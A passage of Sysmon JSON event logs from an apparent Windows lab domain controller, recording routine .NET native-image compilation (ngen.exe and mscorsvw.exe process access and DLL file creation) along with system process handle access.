C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:45.933","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010431F0F00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:45.996\r\nProcessGuid: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nProcessId: 632\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\278-0\\PresentationFramework-SystemXml.dll\r\nCreationUtcTime: 2020-08-01 05:58:45.996","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:45.996","ProcessGuid":"{A837DB8D-0495-5F25-0000-0010431F0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\278-0\\PresentationFramework-SystemXml.dll","CreationUtcTime":"2020-08-01 05:58:45.996","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.027\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00101C8C0D00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.027","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00101C8C0D00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.027\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00101C8C0D00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.027","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00101C8C0D00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.027\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00101C8C0D00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.027","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00101C8C0D00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.074\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00109D8F0D00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.074","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00109D8F0D00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.074\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00109D8F0D00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.074","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00109D8F0D00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.074\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-00109D8F0D00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.074","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-00109D8F0D00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:46.121\r\nProcessGuid: {A837DB8D-0496-5F25-0000-001082270F00}\r\nProcessId: 3320\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cf8-0\\PresentationFramework-SystemXmlLinq.dll\r\nCreationUtcTime: 2020-08-01 05:58:46.121","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:46.121","ProcessGuid":"{A837DB8D-0496-5F25-0000-001082270F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cf8-0\\PresentationFramework-SystemXmlLinq.dll","CreationUtcTime":"2020-08-01 05:58:46.121","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.152\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001006930D00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v